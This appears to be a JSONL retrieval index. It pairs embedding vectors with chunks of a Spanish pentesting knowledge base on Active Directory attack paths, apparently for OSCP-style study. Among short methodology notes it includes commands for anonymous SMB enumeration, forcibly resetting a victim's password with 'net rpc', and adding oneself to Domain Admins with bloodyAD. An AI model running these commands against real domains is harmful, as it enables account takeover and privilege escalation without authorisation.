-0.03942, 0.06245, -0.01043, 0.02658, -0.03748, -0.03901, -0.08492, -0.06413, -0.01592, -0.01913]} +{"tipo": "metodologia", "herramienta": "Active Directory", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "texto": "## Los 7 caminos que SIEMPRE pruebas\n1. **Anonymous SMB** → SMB (`smbclient -L //IP -N`, `nxc smb IP -u \"\" -p \"\"`)\n2. **AS-REP Roasting** → AS-REP Roasting\n3. **Kerberoasting** → Kerberoasting\n4. **GPP cpassword** → GPP cpassword\n5. **LAPS** → LAPS\n6. **ACL abuses** → ACL abuses (te los pinta BloodHound)\n7. **DCSync** → DCSync", "v": [-0.10348, -0.23827, -0.06736, -0.09899, -0.04502, -0.26666, -0.09127, -0.03555, -0.12235, 0.22849, 0.00539, -0.00328, 0.06017, -0.18106, -0.01732, 0.00754, -0.19953, -0.00064, -0.08242, 0.07059, 0.00166, 0.04906, -0.11631, -0.06563, 0.11333, 0.20835, -0.01112, 0.0184, 0.03828, -0.00898, -0.08525, -0.10113, -0.00818, 0.08381, -0.06148, -0.08211, -0.06906, 0.01196, 0.07158, 0.19164, 0.09219, -0.00022, -0.03595, -0.00557, -0.02799, -0.07677, 0.07615, 0.00832, -0.1029, -0.08845, -0.097, 0.02069, -0.13481, -0.04606, -0.05558, 0.02313, 0.04227, -0.00379, -0.14179, 0.00181, 0.07709, 0.04576, -0.02419, -0.03195, 0.0631, -0.09767, -0.02304, -0.05414, -0.05211, 0.03998, -0.02109, 0.06052, 0.02092, -0.05653, 0.10086, -0.0516, 0.07051, -0.02824, 0.10913, 0.02064, 0.0388, -0.05218, -0.12627, -0.02427, -0.02369, -0.04095, 0.12912, -0.12984, 0.02676, -0.06415, 0.0916, 0.06103, -0.01262, 0.09253, -0.00502, -0.06356, -0.04748, -0.00888, 0.10353, -0.01467, 0.04754, 0.08337, -0.06718, 0.01103, -0.00912, 0.00687, 0.09526, -0.00048, 0.08195, -0.02866, 0.02155, 0.12966, 0.02587, -0.00361, 0.01418, 0.00375, 0.02335, -0.03105, 0.04033, -0.01673, 0.03992, 0.0566, -0.0731, 0.02564, -0.03995, 0.06821, 0.04824, 0.0563, -0.02704, 0.03833, 0.0075, -0.01467, -0.01981, 0.0175, -0.00982, 0.00075, -0.02217, 0.02374, -0.01328, -0.03098, 0.03384, 0.02544, 0.05858, 0.07807, 0.02394, -0.00482, 0.01191, -0.05793, -0.04178, 0.02727, 0.07339, 0.03912, -0.04483, 0.01199, -0.01289, -0.03516, -0.00274, -0.03359, -0.03992, 0.0807, -0.05233, 0.04248, 0.0673, 0.08034, -0.04253, 0.0133, 0.01315, -0.02684, 0.03131, -0.02313, 0.01057, -0.03796, -0.0138, 0.00014, -0.031, -0.05143, 0.06312, -0.04767, -0.01486, -0.01941, 0.01931, -0.01791, 0.01075, 0.09341, -0.0236, -0.07055, 0.04516, -0.03391, 0.02287, -0.03426, 0.02165, -0.00807, 0.06686, 0.00819, 0.00908, -0.03284, 0.01245, -0.06313, -0.02776, -0.04476, -0.0342, -0.01495, -0.03923, 0.01186, 0.01624, -0.01446, 0.05289, 0.07126, -0.0674, -0.00967, 0.00453, -0.03046, 0.0078, -0.07409, -0.03838, -0.02634, -0.00907, 0.00726, -0.03285, 0.01957, -0.01004, 0.03832, 0.0134, -0.00807, -0.00961, 0.05425, -0.02173, -0.05721, 0.03092, -0.01226, -0.00515, 0.08265, -0.01132, -0.04324, -0.00297, -0.01261, -0.03551, -0.00366, 0.02055, 0.00483, -0.02302, -0.04933, -0.05019, -0.01382, -0.03906, 0.00783, -0.01538, -0.0271, 0.057, 0.05016, -0.01927, -0.04759, -0.05973, -0.0569, -0.02577, -0.00518]} +{"tipo": "metodologia", "herramienta": "Active Directory", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "texto": "## Conceptos\n- Kerberos (TGT/TGS) · Pass-the-Hash · Golden Ticket · Silver Ticket\n- Crackear los tickets → Cracking de contraseñas\n- Entrar a la red interna → Pivoting ligolo-ng / Tunneling", "v": [-0.18709, -0.26107, -0.01507, -0.13535, 0.02012, -0.17551, -0.052, 0.13418, 0.17097, 0.15789, -0.03475, 0.02984, 0.02822, 0.02538, 0.13049, 0.03965, -0.00284, -0.07004, 0.18092, -0.01908, -0.08657, 0.12094, -0.03916, -0.10843, 0.07326, -0.04568, -0.03553, -0.02902, -0.06486, 0.01108, -0.0471, -0.10606, 0.0047, -0.03893, -0.03344, -0.08757, -0.0209, 0.15945, 0.07175, 0.04434, 0.02991, 0.05826, 0.01467, 0.1562, 0.10704, -0.20892, 0.13599, 0.05488, -0.05505, 0.00173, 0.00013, -0.02665, -0.12273, -0.04341, -1e-05, -0.05449, 0.00214, -0.01961, -0.15595, 0.10539, -0.00941, -0.03549, -0.04693, 0.03498, -0.09582, 0.01471, 0.05027, 0.0433, 0.03121, 0.05271, -0.08378, 0.12793, 0.04102, 0.07525, 0.14538, 0.006, 0.14916, -0.01808, 0.04809, 0.11533, -0.00898, 0.0297, -0.00805, -0.00727, 0.00048, 0.00468, 0.01206, -0.05957, 0.01032, 0.03586, -0.03254, -0.00401, 0.09184, 0.03391, 0.03078, -0.09006, -0.12766, -0.00527, -0.07385, -0.05965, -0.11169, 0.0065, -0.03698, 0.02179, -0.0217, 0.04834, 0.02409, 0.00555, 0.06959, 0.03265, 0.04725, 0.04216, -0.02874, -0.03619, 0.02707, 0.04788, 0.07224, 0.01343, 0.10169, 0.06244, 0.06366, -0.03276, 0.01804, -0.06765, -0.01603, 0.00895, 0.01254, 0.00577, -0.03849, -0.03545, -0.04389, 0.07363, -0.0793, 0.03537, -0.05006, 0.05812, 0.01693, -0.07076, 0.00164, 0.05215, -0.01271, -0.0062, 0.01763, 0.03027, 0.0639, 0.02182, -0.00919, 0.03823, 0.01308, 0.05605, -0.0268, -0.04355, -0.03016, -0.01775, 0.01799, 0.01789, -0.05118, -0.06152, -0.0488, 0.07714, -0.03103, -0.00987, -0.03277, -0.01685, -0.05404, -0.00741, 0.0032, -0.06127, -0.05303, -0.02161, 0.0526, -0.02631, -0.00062, 0.01269, -0.0061, -0.06738, 0.01671, -0.0853, 0.01962, -0.09678, 0.08976, -0.08994, -0.02094, 0.03598, -0.04287, -0.02429, 0.09016, -0.03844, 0.04757, -0.03095, -0.03121, -0.04113, 0.02422, 0.04859, 0.00179, -0.01433, 0.00837, -0.06528, -0.04472, -0.05079, -0.01689, 0.02773, -0.01591, -0.01844, 0.04405, -0.01886, -0.01005, -0.00598, -0.0407, 0.06649, 0.06, -0.06139, 0.03837, -0.0508, -0.01552, 0.01002, -0.02455, 0.01076, -0.03161, -0.03622, 0.01289, 0.03027, 0.02566, 0.00857, -0.05933, -0.03759, -0.00567, 0.00168, 0.00824, 0.02391, 0.08588, 0.01139, 0.00745, 0.03909, 0.0305, -0.0048, -0.03871, -0.00092, -0.05059, 0.01785, 0.02553, 0.0294, 0.04194, 0.07794, -0.0157, -0.00823, -0.00796, 0.01306, 0.05636, 0.00057, -0.00516, -0.00308, -0.0764, -0.0276, -0.01981, 0.00356]} +{"tipo": "metodologia", "herramienta": "Active Directory", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Active Directory.md", "texto": "## Herramientas\nNetExec/CrackMapExec, BloodHound, Rubeus, Kerbrute, Responder, Evil-WinRM, Impacket → Herramientas (índice).\n\nRelacionado: OSCP MOC", "v": [-0.35093, -0.27255, 0.03937, -0.11212, 0.04035, -0.11548, -0.04392, 0.1431, -0.01834, -0.0223, -0.07154, -0.1068, 0.10094, -0.04156, 0.13966, 0.17321, -0.07516, -0.0038, 0.00802, -0.03629, 0.00169, 0.05831, -0.13605, 0.13395, 0.01706, 0.16466, -0.19503, 0.14059, 0.06848, -0.03407, -0.04218, 0.00838, -0.06756, 0.01141, -0.09034, -0.12299, 0.0471, -0.01054, 0.09398, 0.17779, 0.01785, 0.08641, -0.14359, 0.00763, 0.08943, -0.04788, 0.04833, -0.0443, 0.06097, -0.01962, -0.06481, -0.05029, -0.23912, -0.10776, -0.0764, 0.02598, -0.01827, 0.08338, -0.0421, 0.02246, 0.1129, -0.00091, 0.01918, -0.03352, 0.01475, -0.07471, -0.06495, -0.02367, -0.0175, 0.04021, -0.0302, 0.1013, -0.019, -0.07963, 0.03386, -0.04187, 0.01772, -0.04162, 0.09602, 0.06921, -0.01224, 0.00334, -0.02027, -0.02758, -0.0187, 0.00913, 0.102, -0.04009, 0.01526, 0.0185, 0.07554, -0.05756, -0.05108, 0.03367, 0.08353, -0.13599, -0.02839, 0.01342, -0.01011, -0.00073, -0.00727, 0.05086, -0.04107, 0.0217, -0.01793, -0.00733, 0.04124, 0.01618, 0.00909, -0.00349, 0.09785, 0.05832, -0.02787, 0.04977, -0.01945, -0.05701, 0.04004, 0.06192, 0.04629, 0.01487, -0.03103, 0.00433, -0.0099, -0.01706, -0.04099, -0.01011, -0.03442, 0.01614, 0.06064, -0.07027, -0.07747, -0.01942, -0.00656, -0.03831, -0.03375, -0.007, 0.01524, -0.02875, 0.08875, -0.0131, 0.01398, 0.05401, 0.03557, 0.05627, -0.02834, 0.0269, 0.04236, 0.03256, 0.0315, 0.06039, 0.041, 0.01786, 0.04139, 0.03988, 0.06278, -0.02013, 0.00499, 0.02096, 0.03755, -0.00212, 0.02796, -0.02663, -0.00068, 0.02213, -0.02849, 0.08872, 0.03465, -0.00785, -0.0161, -0.01185, 0.02235, 0.07759, 0.00818, 0.02033, -0.06087, -0.0813, 0.06998, -0.04843, -0.00543, -0.01102, 0.00894, -0.04543, 0.06116, 0.02878, -0.00602, 0.0083, 0.04359, 0.00046, -0.04548, -0.0322, 0.03076, 0.02349, 0.05257, -0.01117, -0.02975, -0.02843, 0.06042, -0.02366, -0.03083, -0.03318, 0.01901, -0.0582, 0.01611, -0.01852, 0.06604, 0.00019, 0.06169, 0.02448, -0.0175, 0.03711, -0.04617, 0.014, -0.01432, -0.04307, 0.02458, -0.00615, 0.00581, 0.00988, -0.04221, 0.01463, -0.02506, 0.03421, -0.00407, -0.02124, 0.0115, 0.02999, 0.00539, -0.04589, 0.02224, -0.03514, -0.00457, -0.00078, -0.00602, -0.00771, 0.0236, 0.03471, 0.02505, -0.03432, -0.00945, -0.0122, 0.0299, -0.00562, -0.0069, -0.00164, -0.00543, -0.0933, 0.01412, -0.03628, -0.01807, -0.03659, 0.02401, -0.04174, 0.01525, -0.03003, -0.02487, 0.01237]} +{"tipo": "metodologia", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "texto": "# ACL abuses\n\n> Permisos mal configurados sobre objetos de AD que te dejan escalar. **BloodHound te los pinta** como aristas. Camino de Active Directory.", "v": [0.09648, -0.06182, -0.02896, -0.06951, 0.03617, 0.03914, -0.04675, -0.00353, -0.19727, 0.0856, 0.06866, -0.17478, -0.23169, 0.0382, 0.22748, -0.1958, -0.04722, -0.01553, 0.04715, 0.05379, -0.00141, -0.01301, -0.13867, 0.00258, 0.01741, 0.03151, 0.04847, -0.01254, -0.04904, -0.09381, -0.04781, 0.01715, 0.04587, 0.00545, 0.07775, -0.17418, -0.17747, -0.08518, 0.05552, 0.22264, -0.11594, 0.09999, 0.01449, -0.09458, 0.00844, 0.03533, -0.03238, -0.00384, -0.05106, 0.0452, 0.07629, 0.04605, -0.11841, -0.07574, 0.05335, 0.04372, 0.12055, 0.01138, 0.00543, -0.09269, 0.08227, -0.10596, -0.0401, 0.00599, -0.05375, -0.07816, -0.06622, -0.00695, -0.08641, 0.0431, -0.01714, 0.04046, 0.03753, 0.01682, 0.12739, -0.09757, 0.02915, -0.00317, 0.08748, 0.05964, 0.01469, -0.00371, -0.01332, 0.00228, -0.09244, -0.1465, 0.01986, -0.10009, 0.03473, -0.01661, 0.06805, -0.05295, -0.06187, -0.03565, -0.05363, 0.0264, -0.03391, 0.0631, 0.12022, 0.08432, -0.07585, -0.01542, -0.07106, 0.11667, 0.05865, 0.07921, -0.04903, -0.00634, -0.00819, -0.05758, 0.11165, 0.04911, -0.0244, -0.01195, -0.04763, -0.01174, -0.00974, -0.03621, 0.04373, -0.05291, -0.02649, -0.0041, 0.06204, 0.10304, -0.05739, -0.02255, -0.00858, 0.00806, 0.00431, 0.11739, -0.0496, 0.08009, 0.06569, -0.04739, -0.07312, -0.03296, 0.01627, 0.00668, 0.06795, -0.0894, 0.0961, 0.06276, 0.02211, 0.03644, 0.06911, 0.03033, -0.00753, -0.01226, -0.04881, 0.0106, 0.01088, 0.01072, 0.08369, 0.06722, 0.05528, -0.00951, -0.00322, -0.03352, -0.08866, 0.09044, -0.07649, -0.0035, -0.00382, 0.05708, -0.02924, 0.03663, -0.00881, 0.01998, -0.01792, 0.01572, 0.06136, -0.0082, 0.00416, -0.00876, -0.00766, -0.06536, 0.01532, -0.06728, -0.02505, 0.04104, -0.04942, 0.00351, 0.01482, 0.00553, 0.0102, -0.03593, 0.01731, 0.01772, -0.00949, -0.041, 0.00925, 0.00028, 0.04468, -0.03674, -0.00856, -0.01821, 0.05, -0.03399, -0.01131, -0.00982, 0.02882, -0.02986, 0.00413, -0.02217, 0.02129, -0.01392, -0.01545, 0.04409, -0.0209, 0.03275, 0.07031, -0.02333, 0.06515, -0.01086, -0.00548, 0.0245, -0.00819, -0.01864, -0.05292, -0.01951, -0.01594, 0.09707, 0.04032, -0.02956, 0.03191, 0.07438, -0.02313, 0.00689, 0.03534, 0.02142, -0.03626, 0.01153, -0.05587, -0.02915, -0.01547, 0.06749, 0.0665, 0.00172, -0.00548, -0.01004, -0.0169, 0.08499, 0.03231, -0.02869, -0.03387, -0.06501, -0.03397, 0.06592, 0.025, -0.01177, 0.02245, -0.02046, -0.00797, -0.0445, 0.00898, -0.02635]} +{"tipo": "metodologia", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "texto": "## Las aristas peligrosas\n```\nGenericAll → control total sobre el objeto\nWriteDACL → te das a ti mismo cualquier permiso\nAddMember → te metes en un grupo (ej. Domain Admins)\nForceChangePassword → cambias la pass de otro usuario sin saber la actual\nGenericWrite → modificar atributos (ej. añadir SPN → Kerberoasting dirigido)\n```", "v": [-0.25098, 0.04012, -0.01564, -0.15405, 0.04665, -0.04185, 0.0134, -0.04876, -0.20518, 0.09247, 0.038, -0.17803, -0.11437, -0.12854, 0.15957, -0.04071, 0.14744, -0.03666, -0.0312, 0.01564, 0.00814, -0.06798, 0.01986, -0.12018, 0.00664, -0.04799, -0.011, -0.06131, -0.07735, 0.0717, -0.01518, 0.07565, 0.01965, -0.10779, -0.00677, -0.04753, 0.01008, 0.02492, 0.12204, 0.27418, 0.0384, 0.02645, -0.13826, 0.1719, -0.05993, 0.02134, 0.01436, 0.07284, 0.03402, -0.03339, 0.11577, 0.00423, -0.14259, -0.01325, 0.00543, -0.06908, 0.177, -0.06211, -0.1501, -0.06267, 0.00097, 0.07459, -0.07318, 0.03541, -0.03268, -0.04446, -0.02424, -0.06479, -0.09989, 0.03781, -0.03449, 0.01819, 0.03085, -0.04514, 0.03309, -0.08792, 0.08993, -0.05089, 0.14007, 0.03972, -0.01967, 0.01713, -0.08384, -0.03172, -0.0066, -0.06343, 0.02377, -0.17765, -0.02658, -0.00135, 0.15546, -0.05022, 0.08993, 0.00144, 0.06815, -0.03214, -0.05948, 0.00167, -0.09466, 0.00625, 0.07792, 0.03879, -0.03689, 0.12833, 0.02602, 0.08116, -0.01804, -0.07247, 0.06651, -0.02218, 0.09175, 0.00313, 0.03279, 0.00197, 0.04722, 0.08489, -0.02931, 0.0056, -0.03541, -0.01068, -3e-05, -0.01951, 0.03248, -0.05433, -0.02201, 0.02588, -0.00172, 0.0857, -0.01492, -0.01501, -0.05353, 0.03094, 0.00021, -0.02723, -0.08767, 0.01649, -0.04616, 0.0133, 0.01508, 0.03318, -0.02025, 0.0419, 0.04704, 0.05931, 0.02299, -0.06513, 0.01534, -0.03674, 0.00045, 0.04378, -0.00265, 0.01296, 0.02849, 0.03361, 0.02335, 0.06383, -0.0125, -0.04314, -0.09873, 0.05209, 0.00833, 0.09697, 0.03273, -0.04645, 0.02682, -0.00638, 0.00571, 0.00562, -0.03594, -0.07848, -0.00927, -0.01253, -0.01247, 0.04454, -0.0049, -0.0459, -0.01504, -0.05638, 0.00881, -0.06022, 0.01353, -0.05236, -0.03456, 0.0289, 0.01999, -0.00961, 0.0425, 0.03497, 0.00282, 0.03152, -0.02182, 0.04026, 0.07492, -0.06578, 0.01477, 0.02315, -0.00845, -0.02872, -0.00728, -0.03479, 0.0215, -0.02682, -0.04408, -0.02598, 0.05567, -0.03546, 0.03906, -0.0025, -0.0132, -0.00575, -0.0293, -0.04334, 0.05131, -0.03141, -0.0154, 0.01461, -0.02164, 0.02621, -0.00394, -0.00774, -0.01772, 0.04705, 0.06172, 0.00243, 0.02935, 0.04322, 0.00967, -0.02421, 0.01807, 0.0427, -0.06568, -0.0187, -0.02184, -0.03709, 0.06709, -0.00658, -0.04047, -0.00271, 0.00588, 0.02147, -0.03968, -0.00488, 0.03178, -0.01231, -0.07416, -0.0665, -0.05504, -0.00192, -0.05505, -0.00656, 0.01543, 0.00588, -0.04438, -0.03546, -0.0179, -0.00343]} +{"tipo": "metodologia", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "texto": "# ForceChangePassword:\nnet rpc password \"victima\" \"NuevaPass123!\" -U \"dominio/yo%mipass\" -S DC_IP", "v": [-0.07555, -0.0962, -0.13813, -0.18427, -0.03674, -0.1293, 0.10271, -0.10402, -0.07519, 0.11597, 0.176, -0.11196, -0.03001, -0.09269, -0.16438, -0.00567, 0.10688, 0.12539, -0.00418, -0.072, -0.03205, -0.03075, -0.01635, -0.05405, 0.03566, 0.04429, -0.04339, 0.03574, -0.03005, -0.08133, 0.02096, -0.04592, -0.00655, -0.00375, 0.03542, -0.08753, -0.02278, 0.05082, 0.16418, 0.13957, 0.11949, 0.13289, -0.15441, 0.06214, 0.09651, 0.01619, -0.00348, -0.05351, 0.0404, -0.09595, -0.08522, -0.07672, -0.20735, -0.10727, -0.06799, 0.01791, 0.08126, 0.11409, -0.04339, 0.01599, -0.13516, 0.01543, -0.03696, 0.02653, -0.04832, -0.07918, -0.04905, -0.06309, -0.09772, 0.06782, 0.00761, -0.04462, -0.0127, -0.02334, -0.01245, -0.10198, 0.11992, -0.05782, 0.08405, 0.08203, -0.06438, 0.02139, -0.11682, -0.03814, -0.07187, 0.03895, 0.04269, -0.13078, 0.09504, -0.05841, 0.109, -0.00996, 0.01161, 0.10573, 0.04554, -0.0568, -0.01663, -0.03866, -0.01932, -0.10961, 0.02397, 0.09242, -0.00913, 0.04691, 0.06992, 0.04434, 0.00809, -0.00051, 0.03906, -0.01919, 0.03231, -0.02796, 0.06028, -0.08671, 0.0638, 0.04356, -0.07389, -0.03027, 0.07328, -0.00428, 0.02149, -0.02976, 0.02095, -0.08052, -0.01741, 0.07739, -0.02764, 0.0365, -0.07989, -0.09689, 0.01209, -0.03226, -0.05003, -0.01071, 0.02807, 0.06799, 0.04947, -0.0534, -0.07512, 0.05538, -0.02086, 0.0119, -0.02421, 0.09071, 0.10078, -0.02775, 0.04022, -0.04799, -0.08751, 0.0578, 0.01775, 0.02002, 0.00834, 0.01509, -0.02376, 0.06508, -0.00169, -0.04099, -0.00449, 0.10573, -0.0472, 0.03902, -0.0176, 0.01523, -0.01045, -0.02662, -0.00737, -0.00722, 0.061, -0.05688, 0.02541, -0.02916, -0.00217, 0.06578, -0.03111, -0.08404, 0.0527, -0.02384, 0.03505, -0.06128, 0.01997, -0.02229, -0.00434, 0.03743, -0.01509, -0.03978, 0.07642, -0.01137, -0.0352, 0.00022, 0.03018, -0.01034, -0.00888, 0.04632, -0.02251, -0.03454, -0.04822, -0.02054, -0.00028, -0.05758, -0.01459, 0.01675, -0.00908, -0.02835, 0.00234, -0.03491, 0.09732, -0.00211, -0.0336, -0.04406, -0.0025, -0.05413, 0.05796, -0.09312, -0.04314, -0.06193, -0.00454, 0.02196, -0.00436, -0.02866, -0.00383, 0.03938, -0.01648, 0.001, -0.0154, -0.00388, -0.02966, -0.03537, 0.02715, -0.01009, 0.01119, 0.01487, -0.07153, -0.0701, 0.06055, -0.04687, -0.0919, -0.01066, -0.09138, -0.00331, 0.00283, -0.0106, 0.0767, -0.02813, -0.0407, -0.00795, -0.01251, 0.02865, -0.012, 0.01028, -0.03786, -0.04662, -0.00022, -0.00402, -0.03216, -0.04014]} +{"tipo": "metodologia", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "texto": "# AddMember a un grupo:\nbloodyAD -d corp.local -u yo -p pass --host DC add groupMember \"Domain Admins\" yo\n```", "v": [-0.11062, 0.03283, 0.03251, -0.12664, -0.09628, 0.02206, 0.02938, 0.10991, -0.05496, 0.05368, -0.0578, -0.21795, -0.15829, -0.18125, -0.07806, -0.16739, 0.16367, 0.01908, -0.0257, -0.05509, -0.03748, 0.06741, -0.01001, 0.01838, 0.13127, -0.04055, 0.04331, -0.00827, -0.06105, -0.00263, 0.07901, -0.12217, -0.08535, -0.07854, 0.04549, -0.19255, 0.01568, 0.05738, -0.0001, 0.18761, -0.16493, -0.03234, -0.13058, 0.02573, -0.06573, 0.03566, -0.09019, -0.02203, 0.04125, -0.0656, -0.08892, -0.01579, -0.22338, -0.00069, -0.12696, 0.04733, -0.04438, -0.06089, -0.04029, 0.08362, 0.01637, 0.00267, -0.02119, 0.04769, -0.00718, 0.0818, -0.04818, -0.04054, -0.02744, 0.09283, 0.00796, -0.09278, 0.05922, -0.01515, 0.02278, -0.07988, 0.10669, -0.04497, 0.03919, 0.02939, 0.03535, 0.02673, 0.00808, 0.0153, 0.01514, -0.06965, 0.07361, -0.03903, 0.02229, 0.05247, 0.21131, -0.06745, 0.10068, 0.01418, 0.03259, -0.0786, 0.0523, 0.03638, 0.00295, -0.06887, 0.09003, 0.00673, -0.04989, 0.12283, 0.09631, 0.06339, -0.06712, 0.05544, 0.1289, 0.04143, 0.15486, -0.02235, -0.04614, 0.04134, -0.01961, -0.0183, 0.00689, 0.03113, 0.0691, 0.03923, -0.0732, -0.04249, 0.00509, -0.06063, -0.09597, -0.01298, 0.01545, 0.02267, -0.01915, -0.04166, -0.02564, 0.0226, 0.05535, -0.02462, -0.05449, 0.06218, 0.04753, 0.01752, 0.0112, 0.02375, -0.06713, 0.0218, 0.03125, 0.04935, 0.03027, -0.00874, -0.03991, -0.03592, 0.0245, 0.12423, -0.0621, 0.00623, 0.00066, 0.00683, -0.03485, 0.01988, 0.0767, -0.01828, -0.02466, 0.05574, -0.01809, 0.03343, 0.05963, -0.0127, -0.03611, 0.03745, -0.04456, -0.03384, 0.00202, 0.00323, 0.04892, -0.04656, -0.00796, 0.03779, 0.00597, -0.04059, 0.07799, -0.06308, 0.06309, 0.06653, 0.06865, -0.07593, -0.01096, 0.06299, 0.0204, 0.01734, -0.02541, 0.07258, 0.03191, -0.06101, -0.00209, 0.01999, -0.02858, -0.03016, -0.06856, 0.00465, 0.0021, -0.0599, -0.01698, -0.03811, 0.01296, -0.00394, -0.0211, 0.02663, -0.02609, 0.00868, 0.04111, 0.05311, 0.02727, 0.04652, 0.016, -0.00211, 0.00714, -0.00269, -0.01372, 0.00457, -0.01172, 0.01644, -0.03856, 0.04794, -0.03109, 0.05854, 0.03708, 0.04014, 0.04791, 0.01524, -0.01076, 0.0017, 0.04373, -0.0125, -0.00884, 0.03113, -0.03881, -0.0242, 0.01135, 0.0078, -0.0144, 0.03135, -0.03697, 0.04817, 0.02604, 0.00516, 0.03531, -0.02464, -0.04038, -0.02026, -0.02451, 0.05036, -0.00994, -0.03024, 0.04142, -0.09937, -0.033, -0.01648, 0.02228, 0.0212]} +{"tipo": "metodologia", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "texto": "## Encadenado\nUna arista lleva a otra → BloodHound calcula el **camino** hasta Domain Admins → puede acabar en DCSync.\n\nRelacionado: BloodHound · LAPS · OSCP MOC", "v": [-0.3209, -0.04723, -0.0926, -0.00867, -0.11412, -0.07304, 0.03924, 0.04412, -0.12975, 0.12201, -0.03884, -0.20416, -0.04414, -0.09272, -0.02741, -0.0696, 0.08867, 0.08623, -0.05499, -0.09381, -0.05505, -0.13204, -0.09191, 0.05476, 0.11171, 0.01817, -0.0247, 0.08151, -0.07022, 0.01535, 0.03073, -0.06219, 0.11151, 0.07254, -0.00109, -0.07329, -0.14164, 0.0589, 0.10484, 0.14053, -0.06516, 0.09245, -0.04985, -0.09212, -0.02756, -0.03059, 0.03061, 0.03333, 0.01286, -0.12572, -0.04557, -0.02731, -0.20347, -0.04951, 0.00769, -0.01534, 0.00704, -0.02774, -0.03152, -0.0365, 0.08874, 0.03676, -0.03659, -0.07448, 0.00432, 0.0273, -0.06068, -0.03056, -0.07638, 0.04786, -0.03673, 0.11648, -0.09067, -0.05786, 0.0741, -0.11586, 0.09768, -0.01962, 0.24497, 0.0007, 0.03178, -0.03445, -0.00923, -0.03734, -0.10735, -0.05738, 0.12144, -0.05659, 0.08439, 0.05048, 0.11106, -0.05969, -0.07949, 0.11155, 0.01937, -0.05796, 0.02412, -0.08835, 0.02915, -0.03582, 0.00419, 0.12241, -0.05635, 0.06688, 0.01849, 0.03579, 0.03508, -0.05708, 0.07006, -0.01124, 0.08041, 0.02032, -0.03667, -0.02135, -0.11899, 0.01171, 0.09414, 0.02309, 0.03309, -0.05694, -0.09357, 0.03846, -0.02818, 0.03835, -0.04405, 0.01857, -0.03315, 0.03546, -0.00866, -0.0002, -0.08253, -0.01938, -0.05972, -0.10239, -0.05851, 0.03422, -0.04, 0.01377, 0.01444, -0.03538, 0.0062, 0.05788, 0.05761, -0.01091, 0.03522, 0.00525, 0.00609, -0.07424, -0.02794, 0.01043, 0.03017, 0.01995, 0.02062, -0.01573, 0.00173, 0.00092, -0.01639, -0.00301, -0.07606, 0.01826, -0.01499, 0.00556, 0.02023, -0.01002, -0.0328, 0.05847, 0.02396, 0.01107, -0.03433, -0.03816, 0.01965, -0.00341, -0.05369, 0.02798, 0.00345, -0.05593, 0.02251, -0.12087, 0.04702, 0.00077, 0.01845, -0.01147, -0.00104, 0.02493, -0.0089, 0.00655, 0.01421, -0.00514, 0.02496, -0.02459, 0.03799, 0.03621, 0.08644, -0.04193, -0.01204, -0.0144, 0.0762, -0.05867, 0.00875, -0.04256, 0.0082, -0.01857, -0.03391, 0.05248, 0.02842, 0.0295, 0.0113, 0.10091, -0.08475, 0.02614, -0.04359, -0.04174, 0.0129, -0.03173, 0.05324, 0.01327, 0.03653, -0.01936, -0.0617, 0.03304, -0.00851, 0.02867, 0.01527, -0.03736, -0.00614, 0.03431, 0.04357, -0.00903, 0.03299, -0.00833, -0.01935, 0.04378, -0.01688, -0.02248, 0.00082, 0.06925, 0.0072, -0.02161, -0.01029, -0.01463, 0.06946, 0.01614, 0.00172, -0.03855, -0.02272, -0.08696, -0.00739, 0.02418, 0.00523, -0.0348, 0.02037, -0.0289, 0.004, 0.01129, -0.04086, 0.02199]} +{"tipo": "metodologia", "herramienta": "LAPS", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "texto": "# LAPS\n\n> Local Administrator Password Solution: rota la pass del admin local y la guarda en un atributo del objeto-equipo en AD. Si tu usuario **puede leer ese atributo**, tienes el admin local. Camino de Active Directory.", "v": [-0.08672, 0.02184, -0.10486, -0.30136, -0.05422, -0.10092, 0.01198, -0.04231, -0.14834, 0.14242, -0.07298, -0.20239, -0.05718, -0.01481, 0.20959, -0.08008, 0.1795, -0.03733, -0.01581, 0.09049, 0.05457, 0.05808, -0.02387, 0.08504, 0.10467, 0.08512, 0.14034, 0.02268, -0.06254, 0.02069, 0.0085, 0.06254, 0.00222, -0.03879, 0.00924, -0.03189, 0.00752, 0.06999, -0.04676, 0.20117, 0.0538, 0.11189, -0.11851, 0.14769, 0.02758, 0.05235, 0.06892, -0.06069, 0.00819, -0.01466, -0.00882, -0.09531, -0.11132, -0.12099, 0.13211, -0.02853, 0.09162, -0.05701, 0.01108, -0.04552, -0.0875, -0.02615, -0.08509, 0.01963, 0.0057, -0.01118, -0.00355, -0.07589, -0.06509, -0.03045, 0.07359, -0.01947, 0.00925, 0.02873, 0.0169, 0.04107, 0.03379, 0.07212, 0.12354, 0.03246, 0.01585, 0.08762, -0.03079, -0.11064, -0.08347, -0.12212, 0.09679, -0.09568, 0.04107, -0.00273, 0.10539, 0.01255, 0.05192, -0.02357, -0.09626, -0.01683, -0.03526, -0.03569, -0.00013, 0.07866, 0.0127, 0.00158, -0.01009, 0.13584, 0.1232, -0.00882, -0.03835, 0.06541, 0.03569, -0.06582, 0.14237, -0.05269, -0.05546, 0.03938, 0.03267, 0.02777, 0.00352, -0.01321, 0.02373, 0.05228, 0.00189, 0.01764, 0.07689, -0.0356, 0.00172, 0.02657, -0.00307, 0.03826, -0.04748, 0.03921, 0.00434, -0.0023, 0.04154, -0.00507, -0.11848, 0.05099, 0.06413, 0.02867, -0.00702, -0.03297, -0.02036, -0.05052, 0.02414, 0.04952, 0.08629, 0.00339, -0.01361, 0.00508, -0.06058, 0.03585, 0.00152, -0.02188, 0.01574, 0.04006, -0.02164, 0.12144, 0.03389, -0.04707, -0.01904, 0.03912, -0.03597, 0.01234, 